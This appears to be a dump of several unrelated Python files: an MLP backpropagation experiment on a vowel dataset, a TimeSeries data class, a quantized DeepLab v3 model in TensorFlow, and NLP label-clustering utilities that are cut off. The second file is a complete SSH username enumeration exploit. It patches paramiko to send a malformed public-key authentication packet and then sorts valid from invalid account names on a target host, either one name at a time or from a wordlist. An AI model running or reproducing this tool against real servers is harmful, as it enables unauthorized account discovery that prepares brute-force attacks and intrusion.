numberNodesList = list(numberNodes2)
print("number Nodes",numberNodesList)
numberNodesArray.append(numberNodes2[0])
data_train,data_test , labels_train, labels_test = train_test_split(data, labels, test_size=0.25)
BClass = mlp.MLPClassifier(lr = LR,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, hidden_layer_widths= numberNodesList, validationSize = VALIDATION_SIZE,isHotEncoding= HOTENCODING)
BClass.fit(data_train,labels_train)
enc.fit(labels_train)
enc.fit(labels_test)
labels_train_hot = enc.transform(labels_train).toarray()
labels_test_hot = enc.transform(labels_test).toarray()
mse_train = BClass._get_mse_valSet(data_train,labels_train_hot)
mse_val = BClass.getMSEvalSet()
mse_test = BClass._get_mse_valSet(data_test, labels_test_hot)
MSEs_Test.append(mse_test)
MSEs_Training.append(mse_train)
MSEs_Validation.append(mse_val)
score_run = BClass.getAccuracyValSet()
if score_run > 0.9999:
break
if abs(bestAccuracy - score_run) < bestAccuracy * 0.00001:
numberOfEpochWithNoImprovement.append("1")
else:
if bestAccuracy < score_run :
bestAccuracy= score_run
numberOfEpochWithNoImprovement.clear()
else:
numberOfEpochWithNoImprovement.append("1")
ns = ns + 1
print(numberNodes)
print(numberOfEpochWithNoImprovement)
print("number nodes ", numberNodesArray)
x = np.arange(len(numberNodesArray)) # the label locations
width = 0.2 # the width of the bars
fig, ax = plt.subplots()
barVal = ax.bar(x - width, MSEs_Validation, width, label='Validation Set')
barTrain = ax.bar(x , MSEs_Training, width, label='Training Set')
barTest = ax.bar(x + width, MSEs_Test, width, label='Test Set')
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel('MSE')
ax.set_title('Vowel MSE vs. # Nodes in Hidden Layer')
ax.set_xticks(x)
ax.set_xticklabels(numberNodesArray)
ax.set_xlabel('Hidden Layer Nodes')
ax.legend()
fig.savefig(save_path)
print("")
print("PART 5 VOWEL DATASET")
arff_path = r"training/vowel.arff"
dataRaw = arff.Arff(arff=arff_path, label_count=1)
data = dataRaw.data[:,0:-1]
labels = dataRaw.data[:,-1].reshape(-1,1)
data = data[:, [0,1,3,4,5,6,7,8,9,10,11,12]]
save_path="/home/elkin/university/gradSchool/Fall2020/CS472/CS472/backpropagation/plots/vowelEpochsMomentum"
## Define the initial Parameters ##
LR = 0.1
DET = 10
SHUFFLE = True
MOMENTUM = 0.0
VALIDATION_SIZE = 0.1
HOTENCODING = True
ns = 0
MSEs_Training = []
MSEs_Validation = []
MSEs_Test = []
numberOfEpochWithNoImprovement= []
bestAccuracy = 0
momentumList=[]
numberEpochsToStop=[]
enc = OneHotEncoder()
MOMENTUMS = [0.0,0.1,0.2,0.4,0.5,0.6,0.8]
# while len(numberOfEpochWithNoImprovement) < 2:
for MOMENTUM in MOMENTUMS:
momentumList.append(MOMENTUM)
data_train,data_test , labels_train, labels_test = train_test_split(data, labels, test_size=0.25)
BClass = mlp.MLPClassifier(lr = LR,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, hidden_layer_widths= [16], validationSize = VALIDATION_SIZE,isHotEncoding= HOTENCODING)
BClass.fit(data_train,labels_train)
numberEpochsToStop.append(BClass.get_numberEpochs())
print(momentumList, numberEpochsToStop)
""" GRAPHS MOMENTUM VS EPOCHS """
fig, ax1 = plt.subplots()
ax1.title.set_text('Vowel Epochs vs. Momentum')
color = 'tab:red'
ax1.set_xlabel('Momentum')
ax1.set_ylabel('Epochs', color=color)
ax1.plot(momentumList,numberEpochsToStop, color=color)
ax1.tick_params(axis='y', labelcolor=color)
fig.tight_layout() # otherwise the right y-label is slightly clipped
# plt.show()
fig.savefig(save_path)
|
#!/usr/bin/env python3
import argparse, logging, paramiko, socket, sys, os
class InvalidUsername(Exception):
pass
# malicious function to malform packet
def add_boolean(*args, **kwargs):
pass
# function that'll be overwritten to malform the packet
old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[
paramiko.common.MSG_SERVICE_ACCEPT]
# malicious function to overwrite MSG_SERVICE_ACCEPT handler
def service_accept(*args, **kwargs):
old_add_boolean = paramiko.message.Message.add_boolean
paramiko.message.Message.add_boolean = add_boolean
result = old_service_accept(*args, **kwargs)
paramiko.message.Message.add_boolean = old_add_boolean
return result
# call when username was invalid
def invalid_username(*args, **kwargs):
raise InvalidUsername()
# assign functions to respective handlers
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username
# Print valid users found out so far
def print_result(valid_users):
if(valid_users):
print("Valid Users: ")
for user in valid_users:
print(user)
else:
print("No valid user detected.")
# perform authentication with malicious packet and username
def check_user(username):
try:
sock = socket.socket()
sock.connect((args.target, int(args.port)))
transport = paramiko.transport.Transport(sock)
transport.start_client(timeout=0.5)
except paramiko.ssh_exception.SSHException:
print('[!] Failed to negotiate SSH transport')
sys.exit(2)
try:
transport.auth_publickey(username, paramiko.RSAKey.generate(2048))
except paramiko.ssh_exception.AuthenticationException:
print("[+] {} is a valid username".format(username))
return True
except:
print("[-] {} is an invalid username".format(username))
return False
def check_userlist(wordlist_path):
if os.path.isfile(wordlist_path):
valid_users = []
with open(wordlist_path) as f:
for line in f:
username = line.rstrip()
try:
if(check_user(username)):
valid_users.append(username)
except KeyboardInterrupt:
print("Enumeration aborted by user!")
break;
print_result(valid_users)
else:
print("[-] {} is an invalid wordlist file".format(wordlist_path))
sys.exit(2)
# remove paramiko logging
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
parser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)')
parser.add_argument('target', help="IP address of the target system")
parser.add_argument('-p', '--port', default=22, help="Set port of SSH service")
parser.add_argument('-u', '--user', dest='username', help="Username to check for validity.")
parser.add_argument('-w', '--wordlist', dest='wordlist', help="username wordlist")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if args.wordlist:
check_userlist(args.wordlist)
elif args.username:
check_user(args.username)
else:
print("[-] Username or wordlist must be specified!\n")
parser.print_help()
sys.exit(1)
|
import copy
from collections.abc import Iterable
import numpy as np
__all__ = ["load", "TimeSeries", "DEFAULT_MAX_TIME", "DEFAULT_ERROR_VALUE"]
DEFAULT_MAX_TIME = 1.0
DEFAULT_ERROR_VALUE = 1e-4
def _ndim(x):
"""Return number of dimensions for a (possibly ragged) array."""
n = 0
while isinstance(x, Iterable):
x = x[0]
n += 1
return n
def _compatible_shapes(x, y):
"""Check recursively that iterables x and y (and each iterable contained
within, if applicable), have compatible sizes.
"""
if hasattr(x, "shape") and hasattr(y, "shape"):
return x.shape == y.shape
else:
return len(x) == len(y) and all(
np.shape(x_i) == np.shape(y_i) for x_i, y_i in zip(x, y)
)
def _default_values_like(old_values, value=None, upper=None):
"""Creates a range of default values with the same shape as the input
`old_values`. If `value` is provided then each entry will equal `value`;
if `upper` is provided then the values will be linearly-spaced from 0 to
`upper`.
Parameters
----------
old_values : (n,) or (p,n) array or list of (n,) arrays
Input array(s), typically time series measurements for which default
time or error values need to be inferred.
value : float, optional
Value that each output entry will be set to (omitted if `upper` is
provided).
upper : float, optional
Upper bound of range of linearly-spaced output entries (omitted if
`value` is provided).
"""
if value and upper:
raise ValueError("Only one of `value` or `upper` may be proivded.")
elif value is not None:
lower = value
upper = value
elif upper is not None:
lower = 0.0
else:
raise ValueError("Either `value` or `upper` must be provided.")
new_values = copy.deepcopy(old_values)
if _ndim(old_values) == 1 or (
isinstance(old_values, np.ndarray) and 1 in old_values.shape
):
new_values[:] = np.linspace(lower, upper, len(new_values))
else:
for new_array in new_values:
new_array[:] = np.linspace(lower, upper, len(new_array))
return new_values
def _make_array_if_possible(x):
"""Helper function to cast (1, n) arrays to (n,) arrrays, or uniform lists
of arrays to (p, n) arrays.
"""
try:
x = np.asfarray(x).squeeze()
except ValueError:
pass
return x
def load(ts_path):
"""Load serialized TimeSeries from .npz file."""
with np.load(ts_path) as npz_file:
data = dict(npz_file)
for key in ["time", "measurement", "error"]:
if key not in data: # combine channel arrays into list
n_channels = sum(1 for c in data.keys() if key in c) # time0, ...
data[key] = [data[key + str(i)] for i in range(n_channels)]
# Convert 0d arrays to single values
if "name" in data:
data["name"] = data["name"].item()
if "label" in data:
data["label"] = data["label"].item()
return TimeSeries(
t=data.get("time"),
m=data.get("measurement"),
e=data.get("error"),
meta_features=dict(zip(data["meta_feat_names"], data["meta_feat_values"])),
name=data.get("name"),
label=data.get("label"),
)
class TimeSeries:
"""Class representing a single time series of measurements and metadata.
A `TimeSeries` object encapsulates a single set of time-domain
measurements, along with any metadata describing the observation.
Typically the observations will consist of times, measurements, and
(optionally) measurement errors. The measurements can be scalar- or
vector-valued (i.e., "multichannel"); for multichannel measurements, the
times and errors can also be vector-valued, or they can be shared across
all channels of measurement.
Attributes
----------
time : (n,) or (p, n) array or list of (n,) arrays
Array(s) of times corresponding to measurement values. If `measurement`
is two-dimensional, this can be one-dimensional (same times for each
channel) or two-dimensional (different times for each channel). If
`time` is one-dimensional then it will be broadcast to match
`measurement.shape`.
measurement : (n,) or (p, n) array or list of (n,) arrays
Array(s) of measurement values; can be two-dimensional for
multichannel data. In the case of multichannel data with different
numbers of measurements for each channel, `measurement` will be a list
of arrays instead of a single two-dimensional array.
error : (n,) or (p, n) array or list of (n,) arrays
Array(s) of measurement errors for each value. If `measurement` is
two-dimensional, this can be one-dimensional (same times for each
channel) or two-dimensional (different times for each channel).
If `error` is one-dimensional then it will be broadcast match
`measurement.shape`.
label : str, float, or None
Class label or regression target for the given time series (if
applicable).
meta_features : dict
Dictionary of feature names/values specified independently of the
featurization process in `featurize`.
name : str or None
Identifying name for the given time series (if applicable).
Typically the name of the raw data file from which the time series was
created.
path : str or None
Path to the file where the time series is stored on disk (if
applicable).
channel_names : list of str
List of names of channels of measurement; by default these are simply
`channel_{i}`, but can be arbitrary depending on the nature of the
different measurement channels.
"""
def __init__(
self,
t=None,
m=None,
e=None,
label=None,
meta_features={},
name=None,
path=None,
channel_names=None,
):
"""Create a `TimeSeries` object from measurement values/metadata.
See `TimeSeries` documentation for parameter values.
"""
if t is None and m is None:
raise ValueError("Either times or measurements must be provided.")
elif m is None:
m = _default_values_like(t, value=np.nan)
# If m is 1-dimensional, so are t and e
if _ndim(m) == 1:
self.n_channels = 1
if t is None:
t = _default_values_like(m, upper=DEFAULT_MAX_TIME)
if e is None:
e = _default_values_like(m, value=DEFAULT_ERROR_VALUE)
# If m is 2-dimensional, t and e could be 1d or 2d; default is 1d
elif isinstance(m, np.ndarray) and m.ndim == 2:
self.n_channels = len(m)
if t is None:
t = _default_values_like(m[0], upper=DEFAULT_MAX_TIME)
if e is None:
e = _default_values_like(m[0], value=DEFAULT_ERROR_VALUE)
# If m is ragged (list of 1d arrays), t and e should also be ragged
elif _ndim(m) == 2:
self.n_channels = len(m)
if t is None:
t = _default_values_like(m, upper=DEFAULT_MAX_TIME)
if e is None:
e = _default_values_like(m, value=DEFAULT_ERROR_VALUE)
else:
raise ValueError("m must be a 1D or 2D array, or a 2D list of" " arrays.")
self.time = _make_array_if_possible(t)
self.measurement = _make_array_if_possible(m)
self.error = _make_array_if_possible(e)
self.sort() # re-order by time before broadcasting
if _ndim(self.time) == 1 and _ndim(self.measurement) == 2:
if isinstance(self.measurement, np.ndarray):
self.time = np.broadcast_to(self.time, self.measurement.shape)
else:
raise ValueError(
"Times for each channel must be provided if m" " is a ragged array."
)
if _ndim(self.error) == 1 and _ndim(self.measurement) == 2:
if isinstance(self.measurement, np.ndarray):
self.error = np.broadcast_to(self.error, self.measurement.shape)
else:
raise ValueError(
"Errors for each channel must be provided if"
" m is a ragged array."
)
if not (
_compatible_shapes(self.measurement, self.time)
and _compatible_shapes(self.measurement, self.error)
):
raise ValueError(
"times, values, errors are not of compatible"
" types/sizes. Please refer to the docstring"
" for list of allowed input types."
)
self.label = label
self.meta_features = dict(meta_features)
self.name = name
self.path = path
if channel_names is None:
self.channel_names = [f"channel_{i}" for i in range(self.n_channels)]
else:
self.channel_names = channel_names
def channels(self):
"""Iterates over measurement channels (whether one or multiple)."""
t_channels = self.time
m_channels = self.measurement
e_channels = self.error
if isinstance(self.time, np.ndarray) and self.time.ndim == 1:
t_channels = np.broadcast_to(self.time, (self.n_channels, len(self.time)))
if isinstance(self.measurement, np.ndarray) and self.measurement.ndim == 1:
m_channels = np.broadcast_to(
self.measurement, (self.n_channels, len(self.measurement))
)
if isinstance(self.error, np.ndarray) and self.error.ndim == 1:
e_channels = np.broadcast_to(self.error, (self.n_channels, len(self.error)))
return zip(t_channels, m_channels, e_channels)
def sort(self):
"""Sort times, measurements, and errors by time."""
if _ndim(self.time) == 1:
inds = np.argsort(self.time)
self.time = self.time[inds]
if _ndim(self.measurement) == 1:
self.measurement = self.measurement[inds]
else:
for i in range(len(self.measurement)):
self.measurement[i] = self.measurement[i][inds]
if _ndim(self.error) == 1:
self.error = self.error[inds]
else:
for i in range(len(self.error)):
self.error[i] = self.error[i][inds]
else: # if time is 2d, so are measurement and error
for i in range(len(self.time)):
inds = np.argsort(self.time[i])
self.time[i] = self.time[i][inds]
self.measurement[i] = self.measurement[i][inds]
self.error[i] = self.error[i][inds]
def save(self, path=None):
"""Store TimeSeries object as a single .npz file.
Attributes are stored in the following arrays:
- time
- measurement
- error
- meta_feat_names
- meta_feat_values
- name
- label
If `path` is omitted then the `path` attribute from the TimeSeries
object is used.
"""
if path is None:
path = self.path
data = {
"meta_feat_names": list(self.meta_features.keys()),
"meta_feat_values": list(self.meta_features.values()),
}
for key in ["time", "measurement", "error"]:
value = getattr(self, key)
if isinstance(value, np.ndarray):
data[key] = value
else: # list of arrays -> save each channel separately
for i, value_i in enumerate(value):
data[key + str(i)] = value_i
if self.name:
data["name"] = self.name
if self.label:
data["label"] = self.label
np.savez(path, **data)
|
# -*- coding: utf-8 -*-
"""ResNet model.
Related papers:
https://arxiv.org/pdf/1603.05027v2.pdf
https://arxiv.org/pdf/1512.03385v1.pdf
https://arxiv.org/pdf/1605.07146v1.pdf
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.training import moving_averages
import tensorflow as tf
from quantization import QW,QA,QE,QBits,bitsU,clip
from quantization import QBNG,QBNB,QBNM,QBNV,QBNX,QEBN#batch quant
# 为了finetune resnet_v2_50 对数据每个通道中心化
_R_MEAN = 123.68
_G_MEAN = 116.78
_B_MEAN = 103.94
class Deeplab_v3():
def __init__(self,
output_class,
batch_norm_decay=0.99,
batch_norm_epsilon=1e-3,
is_training=True,):
self._batch_norm_decay = batch_norm_decay
self._batch_norm_epsilon = batch_norm_epsilon
self._is_training = tf.cast(is_training,dtype=tf.bool)
self.num_class = output_class
self.filters = [64, 256, 512, 1024, 2048]
self.strides = [2, 2, 1, 1]
self.n = [3, 4, 6, 3]
self.W_q_op = []
self.W_clip_op = []
def forward_pass(self, x):
"""Build the core model within the graph"""
with tf.variable_scope('resnet_v2_50'):
size = tf.shape(x)[1:3]
x = x - [_R_MEAN, _G_MEAN, _B_MEAN]
x = self._conv_no_q(x, 7, 64, 2, 'conv1', False, False)
x = self._max_pool(x, 3, 2, 'max')
res_func = self._bottleneck_residual_v2
for i in range(4):
with tf.variable_scope('block%d' % (i + 1)):
for j in range(self.n[i]):
with tf.variable_scope('unit_%d' % (j + 1)):
if j == 0:
x = res_func(x, self.filters[i], self.filters[i+1], 1)
elif j == self.n[i] - 1:
x = res_func(x, self.filters[i+1], self.filters[i+1], self.strides[i])
else:
x = res_func(x, self.filters[i+1], self.filters[i+1], 1)
tf.logging.info('the shape of features after block%d is %s' % (i+1, x.get_shape()))
# DeepLab_v3的部分
with tf.variable_scope('DeepLab_v3'):
x = self._atrous_spatial_pyramid_pooling(x)
x = self._conv_no_q(x, 1, self.num_class, 1, 'logits', False, False)
x = tf.image.resize_bilinear(x, size)
return x
def _atrous_spatial_pyramid_pooling(self, x):
"""空洞空间金字塔池化
"""
with tf.variable_scope('ASSP_layers'):
feature_map_size = tf.shape(x)
image_level_features = tf.reduce_mean(x, [1, 2], keep_dims=True)
image_level_features = self._conv(image_level_features, 1, 256, 1, 'global_avg_pool', True)
image_level_features = tf.image.resize_bilinear(image_level_features, (feature_map_size[1],
feature_map_size[2]))
at_pool1x1 = self._conv(x, kernel_size=1, filters=256, strides=1, scope='assp1', batch_norm=True)
at_pool3x3_1 = self._conv(x, kernel_size=3, filters=256, strides=1, scope='assp2', batch_norm=True, rate=6)
at_pool3x3_2 = self._conv(x, kernel_size=3, filters=256, strides=1, scope='assp3', batch_norm=True, rate=12)
at_pool3x3_3 = self._conv(x, kernel_size=3, filters=256, strides=1, scope='assp4', batch_norm=True, rate=18)
net = tf.concat((image_level_features, at_pool1x1, at_pool3x3_1, at_pool3x3_2, at_pool3x3_3), axis=3)
net = self._conv(net, kernel_size=1, filters=256, strides=1, scope='concat', batch_norm=True)
return net
def _bottleneck_residual_v2(self,
x,
in_filter,
out_filter,
stride,):
"""Bottleneck residual unit with 3 sub layers, plan B shortcut."""
with tf.variable_scope('bottleneck_v2'):
origin_x = x
with tf.variable_scope('preact'):
preact = self._batch_norm(x)
self._activation_summary(preact,"BN_Q")
preact = self._relu(preact)
preact = QA(preact)#<---------------------------
preact = QEBN(preact)#<---------------------------
self._activation_summary(preact,"activation_Q")
residual = self._conv(preact, 1, out_filter // 4, stride, 'conv1', True, True)
residual = self._conv(residual, 3, out_filter // 4, 1, 'conv2', True, True)
residual = self._conv(residual, 1, out_filter, 1, 'conv3', False, False)
if in_filter != out_filter:
short_cut = self._conv(preact, 1, out_filter, stride, 'shortcut', False, False)
else:
short_cut = self._subsample(origin_x, stride, 'shortcut')
x = tf.add(residual, short_cut)
return x
def _conv(self,
x,
kernel_size,
filters,
strides,
scope,
batch_norm=False,
activation=False,
rate=None
):
"""Convolution."""
with tf.variable_scope(scope):
x_shape = x.get_shape().as_list()
w = tf.get_variable(name='weights',
shape=[kernel_size, kernel_size, x_shape[3], filters])
self.W_q_op.append(tf.assign(w,QBits(w,bitsU)))
self.W_clip_op.append(tf.assign(w,clip(w,bitsU)))
w = QW(w)#<---------------------------
tf.add_to_collection("weights_Q", w)
self._activation_summary(w,"weight_Q")
if rate == None:
x = tf.nn.conv2d(input=x,
filter=w,
padding='SAME',
strides=[1, strides, strides, 1],
name='conv', )
else:
x = tf.nn.atrous_conv2d(value=x,
filters=w,
padding='SAME',
name='conv',
rate=rate)
x = QE(x)#<---------------------------
self._activation_summary(x,"conv_out")
if batch_norm:
with tf.variable_scope('BatchNorm'):
x = self._batch_norm(x)
self._activation_summary(x,"BN_out")
# else:
# b = tf.get_variable(name='biases', shape=[filters])
# x = x + b
if activation:
x = tf.nn.relu(x)
x = QA(x)#<---------------------------
x = QEBN(x)#<---------------------------
self._activation_summary(x,"activation_Q")
return x
def _conv_no_q(self,
x,
kernel_size,
filters,
strides,
scope,
batch_norm=False,
activation=False,
rate=None
):
"""Convolution."""
with tf.variable_scope(scope):
x_shape = x.get_shape().as_list()
w = tf.get_variable(name='weights',
shape=[kernel_size, kernel_size, x_shape[3], filters])
self._activation_summary(w,"weight_Q")
if rate == None:
x = tf.nn.conv2d(input=x,
filter=w,
padding='SAME',
strides=[1, strides, strides, 1],
name='conv', )
else:
x = tf.nn.atrous_conv2d(value=x,
filters=w,
padding='SAME',
name='conv',
rate=rate)
self._activation_summary(x,"conv_out")
if batch_norm:
with tf.variable_scope('BatchNorm'):
x = self._batch_norm(x)
self._activation_summary(x,"BN_out")
# else:
# b = tf.get_variable(name='biases', shape=[filters])
# x = x + b
if activation:
x = tf.nn.relu(x)
self._activation_summary(x,"activation_Q")
return x
def _L1BN(self, x, mean, variance, offset, scale, variance_epsilon, name=None):
@tf.custom_gradient
def cal_bn(x,mean,variance,variance_epsilon):
def grad(dy):
x_norm = x_bn
shape = x_norm.get_shape().as_list()
reduce_axis = [0, 1, 2] if len(shape) == 4 else [0]
grad_y = dy
grad_y_mean = tf.reduce_mean(grad_y, reduce_axis)
mean = tf.reduce_mean(grad_y * x_norm, reduce_axis)
sign = tf.sign(x_norm)
sign_mean = tf.reduce_mean(sign, reduce_axis)
grad_x = std * (grad_y - grad_y_mean - (sign - sign_mean) * mean)
return grad_x,None,None,None
mean=QBNM(mean)#quantize mean
std=(variance + variance_epsilon)#quantize variance
std=QBNV(std)#add a small value
x_bn = (x - mean) / std#compute normalized x hat
return x_bn,grad
x = cal_bn(x, mean, variance, variance_epsilon)
# x = cal_bn(x, mean)
if scale is not None:
scale = QBNG(scale)#quantize gamma
x = x * scale#compute scaled
if offset is not None:
offset = QBNB(offset)#quantize betta
x = x + offset#compute offseted
x=QBNX(x)#quantize x hat
#x=fbn_x(x)
return x
def _L2BN(self, x, mean, variance, offset, scale, variance_epsilon, name=None):
mean=QBNM(mean)#quantize mean
# std=tf.sqrt(variance + variance_epsilon)#quantize variance
std=variance + variance_epsilon#quantize variance
std=QBNV(std)#add a small value
x = (x - mean) / std#compute normalized x hat
x=QBNX(x)#quantize x hat
if scale is not None:
scale = QBNG(scale)#quantize gamma
x = x * scale#compute scaled
if offset is not None:
offset = QBNB(offset)#quantize betta
x = x + offset#compute offseted
# x=QBNX(x)#quantize x hat
#x=fbn_x(x)
return x
# with tf.name_scope(name, "batchnorm", [x, mean, variance, scale, offset]):
# inv = tf.rsqrt(variance + variance_epsilon)
# if scale is not None:
# inv *= scale
# return x * tf.cast(inv, x.dtype) + tf.cast(
# offset - mean * inv if offset is not None else -mean * inv, x.dtype)
# mean = QBNM(mean)#quantize mean
# inv = tf.rsqrt(variance + variance_epsilon)
# inv = QBNV(inv)
# scale = QBNG(scale)
# offset = QBNB(offset)
# inv *= scale
# return x * tf.cast(inv, x.dtype) + tf.cast(
# offset - mean * inv if offset is not None else -mean * inv, x.dtype)
# mean = QBNM(mean)#quantize mean
# # inv = tf.rsqrt(variance + variance_epsilon)
# inv = tf.sqrt(variance + variance_epsilon)
# inv = QBNV(inv)
# x = (x - mean) / inv
#
# # inv = QBNV(inv)
# scale = QBNG(scale)
# x = x * scale
# offset = QBNB(offset)
# x = x + offset
# x = QBNX(x)
# # x = x * tf.cast(inv, x.dtype)
# # x = x + tf.cast(offset - mean * inv, x.dtype)
# # x = x * inv
# # x = x + offset - mean * inv
# return x
def _batch_norm(self, x):
x_shape = x.get_shape()
params_shape = x_shape[-1:]
axis = list(range(len(x_shape) - 1))
beta = tf.get_variable(name='beta',
shape=params_shape,
initializer=tf.zeros_initializer)
gamma = tf.get_variable(name='gamma',
shape=params_shape,
initializer=tf.ones_initializer)
moving_mean = tf.get_variable(name='moving_mean',
shape=params_shape,
initializer=tf.zeros_initializer,
trainable=False)
moving_variance = tf.get_variable(name='moving_variance',
shape=params_shape,
initializer=tf.ones_initializer,
trainable=False)
tf.add_to_collection('BN_MEAN_VARIANCE', moving_mean)
tf.add_to_collection('BN_MEAN_VARIANCE', moving_variance)
# These ops will only be preformed when training.
# mean, variance = tf.nn.moments(x, axis)
mean = tf.reduce_mean(x, axis=axis)
variance = tf.reduce_mean(tf.abs(x - mean), axis=axis)
update_moving_mean = moving_averages.assign_moving_average(moving_mean,
mean,
self._batch_norm_decay,
name='MovingAvgMean')
update_moving_variance = moving_averages.assign_moving_average(moving_variance,
variance,
self._batch_norm_decay,
name='MovingAvgVariance')
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, update_moving_mean)
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, update_moving_variance)
mean, variance = tf.cond(
pred=self._is_training,
true_fn=lambda: (mean, variance),
false_fn=lambda: (moving_mean, moving_variance)
)
x = self._L2BN(x, mean, variance, beta, gamma, self._batch_norm_epsilon)
return x
def _relu(self, x):
return tf.nn.relu(x)
def _max_pool(self, x, pool_size, stride, scope):
with tf.name_scope('max_pool') as name_scope:
x = tf.layers.max_pooling2d(
x, pool_size, stride, 'SAME', name=scope
)
return x
#did not use
def _avg_pool(self, x, pool_size, stride):
with tf.name_scope('avg_pool') as name_scope:
x = tf.layers.average_pooling2d(
x, pool_size, stride, 'SAME')
tf.logging.info('image after unit %s: %s', name_scope, x.get_shape())
return x
#did not use? need to check using print
def _global_avg_pool(self, x):
with tf.name_scope('global_avg_pool') as name_scope:
assert x.get_shape().ndims == 4
x = tf.reduce_mean(x, [1, 2])
tf.logging.info('image after unit %s: %s', name_scope, x.get_shape())
return x
def _concat(self, x, y):
with tf.name_scope('concat') as name_scope:
assert x.get_shape().ndims == 4
assert y.get_shape().ndims == 4
x = tf.concat([x, y], 3)
tf.logging.info('image after unit %s: %s', name_scope, x.get_shape())
return x
def _subsample(self, inputs, stride, scope=None):
"""Subsamples the input along the spatial dimensions."""
if stride == 1:
return inputs
else:
return self._max_pool(inputs, 3, stride, scope)
# def _activation_summary(self, x, summary_type):
# tensor_name = summary_type
# tf.summary.histogram(tensor_name, x)
# mean = tf.reduce_mean(x)
# tf.summary.scalar(tensor_name + '/mean', mean)
# tf.summary.scalar(tensor_name + '/sttdev', tf.sqrt(tf.reduce_sum(tf.square(x - mean))))
# tf.summary.scalar(tensor_name + '/max', tf.reduce_max(x))
# tf.summary.scalar(tensor_name + '/min', tf.reduce_min(x))
def _activation_summary(self, x, summary_type):
return x
|
"""
Utils for the approaches
"""
import math
from typing import Union, Optional, Tuple, List, Dict
# We executed the code on strong CPU clusters without an GPU (ssh compute). Because of this extraordinary
# executing environment, we introduce this flag. To reproduce the results in the paper, enable this flag.
execute_on_ssh_compute = False
import csv
import os
import pathlib
import pickle
import random
import datetime
from functools import reduce
import word_mover_distance.model as word_mover_distance
import loguru
import tensorflow
import numpy
from tensorflow import keras
import nltk
nltk.download("punkt")
nltk.download('universal_tagset')
nltk.download('averaged_perceptron_tagger')
nltk.download("stopwords")
from nltk.corpus import stopwords
setStopWords = set(stopwords.words("english"))
import re
import matplotlib
if execute_on_ssh_compute:
# see
# <https://stackoverflow.com/questions/37604289/tkinter-tclerror-no-display-name-and-no-display-environment-variable>
matplotlib.use("Agg")
from matplotlib import pyplot as plt
plt.rcParams["figure.figsize"] = (7.55, 4.0)
plt.rcParams["axes.titlesize"] = "small"
plt.rcParams["axes.titleweight"] = "light"
import Frames
from Frames import GenericFrame
logger = loguru.logger
# noinspection PyBroadException
class UserLabelCluster:
classes: []
classes_to_one_hot_encode_dict: dict
def __init__(self, user_labels: List[str], word2vec_dict: dict, cluster_k: int, word2vec_embedding_size=300,
semantic_clustering=True, iteration=0):
"""
Initiates a UserLabelCluster
:param user_labels: the user label which will be available during training (do NOT input user labels
= frames which are in validation or even test data!)
:param word2vec_dict: the embedding dictionary, for example glove
:param cluster_k: how many clusters di you want to have? Must be lower equal the number of user labels.
However, there are some special cases:
<ul>
<li> 1: only one cluster, so, there is nothing to predict (making wrong)</li>
<li> -1: clustering is disabled. It's the vanilla version:
<code>
set_of_user_frames = {sample.get("frame", "n/a")
for sample in samples[: int(len(samples) * training_set_percent * 0.95)]}
dict_of_user_frames = {frame: num for num, frame in enumerate(set_of_user_frames)}
amount_clusters_dict_of_user_frames = max(dict_of_user_frames.values()) + 1
</code>
</ul>
:param word2vec_embedding_size: the size of each word2vec embedding
:param semantic_clustering: determines whether a semantic clustering should be enabled.
<ul>
<li><code>True</code>: user labels go through a preprocessing:
removing stopwords, emphasise keywords, ...</li>
<li><code>False:</code>: plain vanilla user label is used</li>
</ul>
"""
assert cluster_k == -1 or 1 <= cluster_k <= len(user_labels)
self.classes = list()
self.classes_to_one_hot_encode_dict = dict()
self.word2vec_dict = word2vec_dict
self.word2vec_embedding_size = word2vec_embedding_size
self.cluster_k = cluster_k
self.semantic_clustering = semantic_clustering
if self.cluster_k != 1:
for user_label in user_labels:
self.insert_class(user_label=user_label)
else:
logger.warning("You choose a special case! "
"With only 1 big cluster, all data-points will lay in this cluster. "
"Hence, there is nothing to compute...")
if self.cluster_k > 1:
path = pathlib.Path("clusters", "{}x{}d_{}_{}c_{}.pkl".format(len(user_labels), word2vec_embedding_size,
"semantic" if semantic_clustering else "",
cluster_k, iteration))
path.parent.mkdir(exist_ok=True, parents=True)
if path.exists():
logger.debug("You computed the clusters already once, here: {}", path.absolute())
self.cluster, self.classes_to_one_hot_encode_dict = pickle.load(path.open(mode="rb"))
logger.success("Successfully loaded the already computed cluster: {}", path.name)
else:
logger.trace("Compute the cluster now...")
self.cluster = nltk.cluster.KMeansClusterer(num_means=self.cluster_k,
distance=nltk.cluster.cosine_distance,
repeats=10 + int(math.sqrt(self.cluster_k) * 3),
avoid_empty_clusters=True)
self.finalize_class_set()
logger.success("Yes, we will store it in \"{}\"", path.name)
pickle.dump((self.cluster, self.classes_to_one_hot_encode_dict), path.open(mode="wb"))
logger.trace("Pickling done: {}", path.stat())
elif self.cluster_k == -1:
logger.warning("You disabled the clustering!"
"Hence, it's possible that further predictions will lead to outputs like"
"\"Your input is in no particular \"class\"\"")
self.classes_to_one_hot_encode_dict = {f: i for i, f in enumerate(self.classes)}
def insert_class(self, user_label: str) -> None:
"""
Inserts a new user label (frame) which should be used by the cluster
NOT RECOMMENDED TO USE FROM OUTSIDE!
:param user_label: the user label which should be inserted
:return: nothing - just updates the internal structure. Has no effect without using self.finalize_class_set
"""
logger.debug("Adds \"{}\" to the user label class", user_label)
if self.cluster_k == -1:
logger.debug("Clustering is disabled. Hence, just added to the list in set-semantic (current length: {})",
len(self.classes))
final_label_tokens = self.convert_label(user_label=user_label)
if final_label_tokens not in self.classes:
self.classes.append(final_label_tokens)
else:
logger.debug("\"{}\" was already in the list!", " ".join(final_label_tokens))
def convert_label(self, user_label: str) -> Tuple[str]:
"""
FOR INTERNAL USE ONLY!
:param user_label: the user label (frame)
:return: a converted tokenized Tuple-list for further processing
"""
